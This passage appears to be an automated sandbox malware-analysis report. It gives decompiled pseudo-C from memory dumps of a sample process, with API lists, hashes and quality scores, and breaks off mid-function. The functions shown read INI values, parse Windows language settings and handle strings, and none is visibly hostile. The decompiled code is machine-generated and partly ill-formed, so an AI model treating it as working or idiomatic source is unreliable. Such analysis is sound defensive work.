                                                        • Opcode ID: 35f2ac30a89580ae2556583faf974e9b612321021f84328ff7e95bb4d263afe6
                                                        • Instruction ID: 521f8fe43b60bf448fbc539a4ea12c6d87116d2fff46461075a2c6d1e77bb79f
                                                        • Opcode Fuzzy Hash: 35f2ac30a89580ae2556583faf974e9b612321021f84328ff7e95bb4d263afe6
                                                        • Instruction Fuzzy Hash: 5D1244B4A0062D9BDF249B64CC55FEA77F9EB44304F4080F5AA08A7251DB709EC6CF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 48%
                                                        			E00B90068(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                        				WCHAR* _v8;
                                                        				WCHAR* _v12;
                                                        				WCHAR* _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				WCHAR* _v28;
                                                        				WCHAR* _v32;
                                                        				WCHAR* _v36;
                                                        				intOrPtr* _t103;
                                                        				signed int _t105;
                                                        				int _t112;
                                                        				int _t113;
                                                        				intOrPtr* _t118;
                                                        				signed int _t122;
                                                        				signed int _t123;
                                                        				signed int _t130;
                                                        				signed int _t132;
                                                        				signed int _t133;
                                                        				signed int _t138;
                                                        				void* _t144;
                                                        				intOrPtr* _t147;
                                                        				intOrPtr _t153;
                                                        				signed int _t155;
                                                        				void* _t162;
                                                        				signed int _t176;
                                                        				signed int _t178;
                                                        				signed int _t182;
                                                        				signed int _t187;
                                                        				signed int* _t189;
                                                        				intOrPtr* _t190;
                                                        				void* _t191;
                                                        				short _t192;
                                                        				void* _t193;
                                                        				void* _t194;
                                                        
                                                        				_push(4);
                                                        				asm("repe cmpsd");
                                                        				_v36 = 0;
                                                        				_v32 = 0;
                                                        				_v28 = 0;
                                                        				_v24 = 0;
                                                        				_v8 = 0;
                                                        				_v12 = 0;
                                                        				_v16 = 0;
                                                        				if(0 == 0) {
                                                        					_t189 = _a4;
                                                        					_t103 =  *((intOrPtr*)(_t189 + 0xc));
                                                        					_t182 =  *((intOrPtr*)( *_t103 + 0x1c))(_t103, _a8,  &_v8, 1,  &_v20);
                                                        					__eflags = _t182;
                                                        					if(_t182 < 0) {
                                                        						L26:
                                                        						_t144 = 0;
                                                        						__eflags = _v36;
                                                        						if(_v36 == 0) {
                                                        							L30:
                                                        							__eflags = _v32;
                                                        							if(_v32 != 0) {
                                                        								_push(_v32);
                                                        								L00B82082();
                                                        							}
                                                        							_t190 = __imp__#6;
                                                        							__eflags = _v8;
                                                        							if(_v8 != 0) {
                                                        								 *_t190(_v8);
                                                        							}
                                                        							__eflags = _v12;
                                                        							if(_v12 != 0) {
                                                        								 *_t190(_v12);
                                                        							}
                                                        							_t105 = _v16;
                                                        							__eflags = _t105;
                                                        							if(_t105 != 0) {
                                                        								 *((intOrPtr*)( *_t105 + 8))(_t105);
                                                        							}
                                                        							goto L38;
                                                        						}
                                                        						_t191 = 0;
                                                        						__eflags = _v28;
                                                        						if(_v28 <= 0) {
                                                        							L29:
                                                        							_push(_v36);
                                                        							L00B82082();
                                                        							goto L30;
                                                        						} else {
                                                        							goto L28;
                                                        						}
                                                        						do {
                                                        							L28:
                                                        							__imp__#9(_v36 + _t191);
                                                        							_t144 = _t144 + 1;
                                                        							_t191 = _t191 + 0x10;
                                                        							__eflags = _t144 - _v28;
                                                        						} while (_t144 < _v28);
                                                        						goto L29;
                                                        					}
                                                        					__eflags = _v20;
                                                        					if(_v20 != 0) {
                                                        						_t112 = lstrlenW( *(_t189 + 8));
                                                        						_t113 = lstrlenW(_v8);
                                                        						_t184 = _t112 + _t113;
                                                        						__imp__#4(0, _t112 + _t113);
                                                        						_v12 = _t113;
                                                        						__eflags = _t113;
                                                        						if(_t113 == 0) {
                                                        							L22:
                                                        							_t182 = 0x8007000e;
                                                        							goto L26;
                                                        						}
                                                        						E00B831BD(_t113, _t184 + 1,  *(_t189 + 8));
                                                        						E00B836CD(_v12, _t184 + 1, _v8);
                                                        						_t153 =  *0xb97010; // 0x0
                                                        						_t182 = E00B9054D(_t153,  &_v16);
                                                        						__eflags = _t182;
                                                        						if(_t182 < 0) {
                                                        							goto L26;
                                                        						}
                                                        						_t118 = _v16;
                                                        						_a8 = _a8 & 0x00000000;
                                                        						_t182 =  *((intOrPtr*)( *_t118 + 0x14))(_t118, 0xb81804,  &_v12, 1, _a16,  &_a8);
                                                        						__eflags = _t182;
                                                        						if(_t182 >= 0) {
                                                        							_t147 = _a24;
                                                        							_t155 =  *(_t147 + 0xc);
                                                        							__eflags = _t155;
                                                        							if(__eflags <= 0) {
                                                        								L13:
                                                        								_a4 =  &_v36;
                                                        								_t122 =  *((intOrPtr*)(_t147 + 8)) + 1;
                                                        								_v24 = _t155 + 1;
                                                        								_t176 = 0x10;
                                                        								_v28 = _t122;
                                                        								_t123 = _t122 * _t176;
                                                        								_push( ~(0 | __eflags > 0x00000000) | _t123);
                                                        								L00B82877();
                                                        								_v36 = _t123;
                                                        								__eflags = _t123;
                                                        								if(_t123 == 0) {
                                                        									goto L22;
                                                        								}
                                                        								_t162 = 9;
                                                        								 *_t123 = _t162;
                                                        								_v36[4] =  *(_t189 + 4);
                                                        								_t192 =  *(_t189 + 4);
                                                        								 *((intOrPtr*)( *_t192 + 4))(_t192);
                                                        								_t187 = 1;
                                                        								__eflags = _v28 - 1;
                                                        								if(_v28 <= 1) {
                                                        									L17:
                                                        									_a12 = 1;
                                                        									__eflags = _v28 - 1;
                                                        									if(__eflags <= 0) {
                                                        										L21:
                                                        										_t178 = 4;
                                                        										_t130 = _v24 * _t178;
                                                        										_push( ~(0 | __eflags > 0x00000000) | _t130);
                                                        										L00B82877();
                                                        										_v32 = _t130;
                                                        										__eflags = _t130;
                                                        										if(_t130 != 0) {
                                                        											 *_t130 = 0xfffffd9b;
                                                        											_t132 = 1;
                                                        											__eflags = _v24 - 1;
                                                        											if(_v24 <= 1) {
                                                        												L25:
                                                        												__imp__#201(0, 0);
                                                        												_t133 = _v16;
                                                        												_t182 =  *((intOrPtr*)( *_t133 + 0x18))(_t133, _a8, 0xb81804, _a16, _a20, _a4, _a28, _a32, _a36);
                                                        												goto L26;
                                                        											} else {
                                                        												goto L24;
                                                        											}
                                                        											do {
                                                        												L24:
                                                        												 *((intOrPtr*)(_v32 + _t132 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 4)) + _t132 * 4 - 4));
                                                        												_t132 = _t132 + 1;
                                                        												__eflags = _t132 - _v24;
                                                        											} while (_t132 < _v24);
                                                        											goto L25;
                                                        										}
                                                        										goto L22;
                                                        									}
                                                        									_t193 = 0x10;
                                                        									while(1) {
                                                        										_t138 = _v36 + _t193;
                                                        										__imp__#10(_t138,  *_t147 + _t193 - 0x10);
                                                        										_t182 = _t138;
                                                        										__eflags = _t182;
                                                        										if(_t182 < 0) {
                                                        											goto L26;
                                                        										}
                                                        										_a12 = _a12 + 1;
                                                        										_t193 = _t193 + 0x10;
                                                        										__eflags = _a12 - _v28;
                                                        										if(__eflags < 0) {
                                                        											continue;
                                                        										}
                                                        										goto L21;
                                                        									}
                                                        									goto L26;
                                                        								}
                                                        								_t194 = 0x10;
                                                        								do {
                                                        									__imp__#8(_v36 + _t194);
                                                        									_t187 = _t187 + 1;
                                                        									_t194 = _t194 + 0x10;
                                                        									__eflags = _t187 - _v28;
                                                        								} while (_t187 < _v28);
                                                        								goto L17;
                                                        							}
                                                        							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 4)))) - 0xfffffd9b;
                                                        							if(__eflags != 0) {
                                                        								goto L13;
                                                        							}
                                                        							_a4 = _t147;
                                                        							goto L25;
                                                        						}
                                                        						__eflags = _t182 - 0x80020006;
                                                        						if(_t182 == 0x80020006) {
                                                        							_t182 = 0;
                                                        						}
                                                        						goto L26;
                                                        					}
                                                        					_t182 = 0x8000ffff;
                                                        					goto L26;
                                                        				} else {
                                                        					_t182 = 0x80070057;
                                                        					L38:
                                                        					return _t182;
                                                        				}
                                                        			}


                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ??3@FreeString$ClearVariant
                                                        • String ID:
                                                        • API String ID: 248599420-0
                                                        • Opcode ID: 01a6eead6d5ae8837fe9a723a3366498646b5452d41793284d01fd4e29973d06
                                                        • Instruction ID: 1ada4fac2ffce3c6025e45af9ea8a1ea779b15e916a3274f7a085f320b0b9ccf
                                                        • Opcode Fuzzy Hash: 01a6eead6d5ae8837fe9a723a3366498646b5452d41793284d01fd4e29973d06
                                                        • Instruction Fuzzy Hash: D191417591021AEFCF11EFA8C889AAE7BF5FF48311F1444B9E515AB250DB31D941CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B9374D(void* __edx, short* _a4, short* _a8, short* _a12, short* _a16, long _a20, short* _a24) {
                                                        				signed int _v8;
                                                        				char* _v12;
                                                        				CHAR* _v16;
                                                        				char* _v20;
                                                        				char* _v24;
                                                        				char* _v28;
                                                        				void* _v40;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t46;
                                                        				int _t48;
                                                        				signed int _t51;
                                                        				int _t54;
                                                        				int _t57;
                                                        				void* _t61;
                                                        				char* _t63;
                                                        				int _t68;
                                                        				void* _t75;
                                                        				int _t76;
                                                        				int _t77;
                                                        				signed int _t78;
                                                        				CHAR* _t79;
                                                        				intOrPtr _t81;
                                                        
                                                        				_t75 = __edx;
                                                        				_t46 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t46 ^ _t78;
                                                        				_t81 =  *0xb97001; // 0x0
                                                        				if(_t81 == 0) {
                                                        					_t77 = WideCharToMultiByte;
                                                        					_t76 = _t76 | 0xffffffff;
                                                        					_t48 = WideCharToMultiByte(0, 0, _a4, _t76, 0, 0, 0, 0);
                                                        					_v12 = _t48;
                                                        					if(_t48 != 0) {
                                                        						E00B8320B(_t48);
                                                        						_v28 = _t79;
                                                        						if(_t79 != 0) {
                                                        							if(WideCharToMultiByte(0, 0, _a4, _t76, _v28, _v12, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							_t54 = WideCharToMultiByte(0, 0, _a8, _t76, 0, 0, 0, 0);
                                                        							_v12 = _t54;
                                                        							if(_t54 == 0) {
                                                        								goto L3;
                                                        							}
                                                        							E00B8320B(_t54);
                                                        							_v24 = _t79;
                                                        							if(_t79 == 0) {
                                                        								goto L6;
                                                        							}
                                                        							if(WideCharToMultiByte(0, 0, _a8, _t76, _v24, _v12, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							_t57 = WideCharToMultiByte(0, 0, _a12, _t76, 0, 0, 0, 0);
                                                        							_v12 = _t57;
                                                        							if(_t57 == 0) {
                                                        								goto L3;
                                                        							}
                                                        							E00B8320B(_t57);
                                                        							_v20 = _t79;
                                                        							if(_t79 == 0) {
                                                        								goto L6;
                                                        							}
                                                        							if(WideCharToMultiByte(0, 0, _a12, _t76, _v20, _v12, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							if(lstrlenW(_a24) <= 0) {
                                                        								_t61 = 4;
                                                        								E00B8321E(_t61);
                                                        								_t63 = _t79;
                                                        								_v16 = _t63;
                                                        								if(_t63 == 0) {
                                                        									goto L6;
                                                        								}
                                                        								 *_t63 = 0;
                                                        								L21:
                                                        								_t77 = _a20;
                                                        								E00B8320B(_t77 + 1);
                                                        								_v12 = _t79;
                                                        								if(_t79 == 0) {
                                                        									goto L6;
                                                        								}
                                                        								GetPrivateProfileStringA(_v24, _v20, _v16, _v12, _t77, _v28);
                                                        								if(MultiByteToWideChar(0, 0, _v12, _t76, _a16, _t77) == 0) {
                                                        									goto L3;
                                                        								}
                                                        								L23:
                                                        								_t51 = 0;
                                                        								L24:
                                                        								return E00B81335(_t51, 0, _v8 ^ _t78, _t75, _t76, _t77);
                                                        							}
                                                        							_t68 = WideCharToMultiByte(0, 0, _a24, _t76, 0, 0, 0, 0);
                                                        							_v12 = _t68;
                                                        							if(_t68 == 0) {
                                                        								goto L3;
                                                        							}
                                                        							E00B8320B(_t68);
                                                        							_v16 = _t79;
                                                        							if(_t79 == 0) {
                                                        								goto L6;
                                                        							}
                                                        							if(WideCharToMultiByte(0, 0, _a24, _t76, _v16, _v12, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							goto L21;
                                                        						}
                                                        						L6:
                                                        						_t51 = 0x8007000e;
                                                        						goto L24;
                                                        					}
                                                        					L3:
                                                        					_t51 = GetLastError();
                                                        					if(_t51 > 0) {
                                                        						_t51 = _t51 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					goto L24;
                                                        				}
                                                        				GetPrivateProfileStringW(_a8, _a12, _a24, _a16, _a20, _a4);
                                                        				goto L23;
                                                        			}




























                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000104,?,00000000,?,00000104,?), ref: 00B9377E
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000104,00000000,00000000,00000000,00000000,00000104,?,00000000,00000104,?,?,00000104,?), ref: 00B9379C
                                                        • GetLastError.KERNEL32 ref: 00B937A5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                        • String ID:
                                                        • API String ID: 3760252266-0
                                                        • Opcode ID: 56f8617956cef3ab18aec50d10aba173b699acd4485b259928eb103cfc5cf650
                                                        • Instruction ID: 2d8f67f0b3fcd49b64776dde909b3eacb6a6eba4fa708d96764bf7dfd8b8f24c
                                                        • Opcode Fuzzy Hash: 56f8617956cef3ab18aec50d10aba173b699acd4485b259928eb103cfc5cf650
                                                        • Instruction Fuzzy Hash: 90512AF290114EBEAF116FE18CC5DBF7EFDEB05B94B1444A9F611A2020D6358E61DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 94%
                                                        			E022F8788(signed int __ecx, void* __edx, signed int _a4) {
                                                        				signed int _v8;
                                                        				short* _v12;
                                                        				void* _v16;
                                                        				signed int _v20;
                                                        				char _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				char _v44;
                                                        				signed int _v48;
                                                        				signed int _v52;
                                                        				signed int _v56;
                                                        				signed int _v60;
                                                        				char _v68;
                                                        				void* _t216;
                                                        				intOrPtr _t231;
                                                        				short* _t235;
                                                        				intOrPtr _t257;
                                                        				short* _t261;
                                                        				intOrPtr _t284;
                                                        				intOrPtr _t288;
                                                        				void* _t314;
                                                        				signed int _t318;
                                                        				short* _t319;
                                                        				intOrPtr _t321;
                                                        				void* _t328;
                                                        				void* _t329;
                                                        				char* _t332;
                                                        				signed int _t333;
                                                        				signed int* _t334;
                                                        				void* _t335;
                                                        				void* _t338;
                                                        				void* _t339;
                                                        
                                                        				_t328 = __edx;
                                                        				_t322 = __ecx;
                                                        				_t318 = 0;
                                                        				_t334 = _a4;
                                                        				_v8 = 0;
                                                        				_v28 = 0;
                                                        				_v48 = 0;
                                                        				_v20 = 0;
                                                        				_v40 = 0;
                                                        				_v32 = 0;
                                                        				_v52 = 0;
                                                        				if(_t334 == 0) {
                                                        					_t329 = 0xc000000d;
                                                        					L49:
                                                        					_t334[0x11] = _v56;
                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                        					_t334[0x12] = _v60;
                                                        					_t334[0x13] = _v28;
                                                        					_t334[0x17] = _v20;
                                                        					_t334[0x16] = _v48;
                                                        					_t334[0x18] = _v40;
                                                        					_t334[0x14] = _v32;
                                                        					_t334[0x15] = _v52;
                                                        					return _t329;
                                                        				}
                                                        				_v56 = 0;
                                                        				if(E022F8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_v56 = 1;
                                                        					if(_v8 != 0) {
                                                        						_t207 = E022DE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        					}
                                                        					_push(1);
                                                        					_v8 = _t318;
                                                        					E022F718A(_t207);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_v60 = _v60 | 0xffffffff;
                                                        				if(E022F8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_t333 =  *_v8;
                                                        					_v60 = _t333;
                                                        					_t314 = E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					_push(_t333);
                                                        					_v8 = _t318;
                                                        					E022F718A(_t314);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_t216 = E022F8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                        				_t332 = ";";
                                                        				if(_t216 < 0) {
                                                        					L17:
                                                        					if(E022F8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                        						L30:
                                                        						if(E022F8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                        							L46:
                                                        							_t329 = 0;
                                                        							L47:
                                                        							if(_v8 != _t318) {
                                                        								E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        							}
                                                        							if(_v28 != _t318) {
                                                        								if(_v20 != _t318) {
                                                        									E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        									_v20 = _t318;
                                                        									_v40 = _t318;
                                                        								}
                                                        							}
                                                        							goto L49;
                                                        						}
                                                        						_t231 = _v24;
                                                        						_t322 = _t231 + 4;
                                                        						_push(_t231);
                                                        						_v52 = _t322;
                                                        						E022F718A(_t231);
                                                        						if(_t322 == _t318) {
                                                        							_v32 = _t318;
                                                        						} else {
                                                        							_v32 = E022DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        						}
                                                        						if(_v32 == _t318) {
                                                        							_v52 = _t318;
                                                        							L58:
                                                        							_t329 = 0xc0000017;
                                                        							goto L47;
                                                        						} else {
                                                        							E022D2340(_v32, _v8, _v24);
                                                        							_v16 = _v32;
                                                        							_a4 = _t318;
                                                        							_t235 = E022EE679(_v32, _t332);
                                                        							while(1) {
                                                        								_t319 = _t235;
                                                        								if(_t319 == 0) {
                                                        									break;
                                                        								}
                                                        								 *_t319 = 0;
                                                        								_t321 = _t319 + 2;
                                                        								E022DE2A8(_t322,  &_v68, _v16);
                                                        								if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        								_v16 = _t321;
                                                        								_t235 = E022EE679(_t321, _t332);
                                                        								_pop(_t322);
                                                        							}
                                                        							_t236 = _v16;
                                                        							if( *_v16 != _t319) {
                                                        								E022DE2A8(_t322,  &_v68, _t236);
                                                        								if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        							}
                                                        							if(_a4 == 0) {
                                                        								E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                        								_v52 = _v52 & 0x00000000;
                                                        								_v32 = _v32 & 0x00000000;
                                                        							}
                                                        							if(_v8 != 0) {
                                                        								E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        							}
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_t318 = 0;
                                                        							goto L46;
                                                        						}
                                                        					}
                                                        					_t257 = _v24;
                                                        					_t322 = _t257 + 4;
                                                        					_push(_t257);
                                                        					_v40 = _t322;
                                                        					E022F718A(_t257);
                                                        					_t338 = _t335 + 4;
                                                        					if(_t322 == _t318) {
                                                        						_v20 = _t318;
                                                        					} else {
                                                        						_v20 = E022DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        					}
                                                        					if(_v20 == _t318) {
                                                        						_v40 = _t318;
                                                        						goto L58;
                                                        					} else {
                                                        						E022D2340(_v20, _v8, _v24);
                                                        						_v16 = _v20;
                                                        						_a4 = _t318;
                                                        						_t261 = E022EE679(_v20, _t332);
                                                        						_t335 = _t338 + 0x14;
                                                        						while(1) {
                                                        							_v12 = _t261;
                                                        							if(_t261 == _t318) {
                                                        								break;
                                                        							}
                                                        							_v12 = _v12 + 2;
                                                        							 *_v12 = 0;
                                                        							E022DE2A8(_v12,  &_v68, _v16);
                                                        							if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        							_v16 = _v12;
                                                        							_t261 = E022EE679(_v12, _t332);
                                                        							_pop(_t322);
                                                        						}
                                                        						_t269 = _v16;
                                                        						if( *_v16 != _t318) {
                                                        							E022DE2A8(_t322,  &_v68, _t269);
                                                        							if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        						}
                                                        						if(_a4 == _t318) {
                                                        							E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        							_v40 = _t318;
                                                        							_v20 = _t318;
                                                        						}
                                                        						if(_v8 != _t318) {
                                                        							E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        						}
                                                        						_v8 = _t318;
                                                        						goto L30;
                                                        					}
                                                        				}
                                                        				_t284 = _v24;
                                                        				_t322 = _t284 + 4;
                                                        				_push(_t284);
                                                        				_v48 = _t322;
                                                        				E022F718A(_t284);
                                                        				_t339 = _t335 + 4;
                                                        				if(_t322 == _t318) {
                                                        					_v28 = _t318;
                                                        				} else {
                                                        					_v28 = E022DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        				}
                                                        				if(_v28 == _t318) {
                                                        					_v48 = _t318;
                                                        					goto L58;
                                                        				} else {
                                                        					E022D2340(_v28, _v8, _v24);
                                                        					_v16 = _v28;
                                                        					_a4 = _t318;
                                                        					_t288 = E022EE679(_v28, _t332);
                                                        					_t335 = _t339 + 0x14;
                                                        					while(1) {
                                                        						_v12 = _t288;
                                                        						if(_t288 == _t318) {
                                                        							break;
                                                        						}
                                                        						_v12 = _v12 + 2;
                                                        						 *_v12 = 0;
                                                        						E022DE2A8(_v12,  &_v68, _v16);
                                                        						if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        						_v16 = _v12;
                                                        						_t288 = E022EE679(_v12, _t332);
                                                        						_pop(_t322);
                                                        					}
                                                        					_t296 = _v16;
                                                        					if( *_v16 != _t318) {
                                                        						E022DE2A8(_t322,  &_v68, _t296);
                                                        						if(E022F5553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        					}
                                                        					if(_a4 == _t318) {
                                                        						E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                        						_v48 = _t318;
                                                        						_v28 = _t318;
                                                        					}
                                                        					if(_v8 != _t318) {
                                                        						E022DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					}
                                                        					_v8 = _t318;
                                                        					goto L17;
                                                        				}
                                                        			}


                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-Allowed, xrefs: 022F8827
                                                        • Kernel-MUI-Number-Allowed, xrefs: 022F87E6
                                                        • Kernel-MUI-Language-SKU, xrefs: 022F89FC
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 022F8914
                                                        • WindowsExcludedProcs, xrefs: 022F87C1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 19e859dc8b589d87901887121b493b833a8e86fedb9bc13b44f2ea7da033d69f
                                                        • Instruction ID: 6fb79d7e1d46d6f548134400af225bf760e0f7b52db59aacf58112c6940d21f7
                                                        • Opcode Fuzzy Hash: 19e859dc8b589d87901887121b493b833a8e86fedb9bc13b44f2ea7da033d69f
                                                        • Instruction Fuzzy Hash: 05F1E3B2D20209EFCF51DFD4C980AAEF7B9FB08304F55446AE605A7214E734AA45DF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 95%
                                                        			E00B81A03(void* __ebx, int __ecx, void* __edx, void* __eflags, void* _a4, long _a8) {
                                                        				signed int _v8;
                                                        				char _v520;
                                                        				long _v524;
                                                        				void* _v528;
                                                        				long _v532;
                                                        				void* _v536;
                                                        				signed int _v540;
                                                        				int _v544;
                                                        				int _v552;
                                                        				void* _v556;
                                                        				intOrPtr _v564;
                                                        				char _v568;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t76;
                                                        				long _t83;
                                                        				long _t87;
                                                        				int _t90;
                                                        				int _t92;
                                                        				int _t94;
                                                        				long _t95;
                                                        				int _t98;
                                                        				int _t101;
                                                        				long _t102;
                                                        				int _t103;
                                                        				long _t104;
                                                        				int _t105;
                                                        				int _t108;
                                                        				signed int _t109;
                                                        				signed int _t110;
                                                        				int _t111;
                                                        				long _t115;
                                                        				int _t117;
                                                        				void* _t118;
                                                        				int _t119;
                                                        				void* _t120;
                                                        				void* _t131;
                                                        				void* _t140;
                                                        				void* _t141;
                                                        				long _t142;
                                                        				signed int _t143;
                                                        
                                                        				_t140 = __edx;
                                                        				_t118 = __ebx;
                                                        				_t76 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t76 ^ _t143;
                                                        				_t142 = _a8;
                                                        				_v544 = __ecx;
                                                        				_v536 = _a4;
                                                        				E00B81911( &_v568);
                                                        				E00B818B2( &_v556);
                                                        				_v540 = _v540 & 0x00000000;
                                                        				if(_t142 == 0) {
                                                        					_t142 = 0xb89acc;
                                                        				}
                                                        				_t141 = lstrlenW(_t142);
                                                        				_t83 = E00B81923( &_v568, _t142, _t142 + _t141 * 2);
                                                        				_v524 = _t83;
                                                        				if(_t83 < 0) {
                                                        					L22:
                                                        					E00B815A1( &_v556);
                                                        					__eflags = _v8 ^ _t143;
                                                        					return E00B81335(_v524, _t118, _v8 ^ _t143, _t140, _t141, _t142);
                                                        				} else {
                                                        					_t87 = E00B818C4( &_v556, _t141);
                                                        					_v524 = _t87;
                                                        					if(_t87 < 0) {
                                                        						goto L22;
                                                        					}
                                                        					_push(_t118);
                                                        					_t141 = 0;
                                                        					_t142 = 0xd;
                                                        					while(_v568 < _v564) {
                                                        						_t120 = E00B819CE( &_v568);
                                                        						if(_t120 == 0xa) {
                                                        							__eflags = _t141 - _t142;
                                                        							if(_t141 == _t142) {
                                                        								goto L6;
                                                        							}
                                                        							_v528 = _t142;
                                                        							_t117 = E00B81954( &_v556,  &_v528, 1);
                                                        							_v524 = _t117;
                                                        							__eflags = _t117;
                                                        							if(_t117 >= 0) {
                                                        								goto L6;
                                                        							}
                                                        							L21:
                                                        							_pop(_t118);
                                                        							goto L22;
                                                        						}
                                                        						L6:
                                                        						_v528 = _t120 & 0x0000ffff;
                                                        						_t115 = E00B81954( &_v556,  &_v528, 1);
                                                        						_v524 = _t115;
                                                        						if(_t115 < 0) {
                                                        							goto L21;
                                                        						}
                                                        						_t141 = _t120;
                                                        					}
                                                        					_v528 = _t142;
                                                        					_t90 = E00B81954( &_v556,  &_v528, 1);
                                                        					_v524 = _t90;
                                                        					__eflags = _t90;
                                                        					if(_t90 < 0) {
                                                        						goto L21;
                                                        					}
                                                        					_v528 = 0xa;
                                                        					_t92 = E00B81954( &_v556,  &_v528, 1);
                                                        					_v524 = _t92;
                                                        					__eflags = _t92;
                                                        					if(_t92 < 0) {
                                                        						goto L21;
                                                        					}
                                                        					__eflags =  *0xb97001;
                                                        					_t141 = _v556;
                                                        					_t119 = _v552;
                                                        					if( *0xb97001 == 0) {
                                                        						L13:
                                                        						_t142 = WideCharToMultiByte;
                                                        						_t94 = WideCharToMultiByte(1, 0, _t141, _t119, 0, 0, 0, 0);
                                                        						_v544 = _t94;
                                                        						__eflags = _t94;
                                                        						if(_t94 <= 0) {
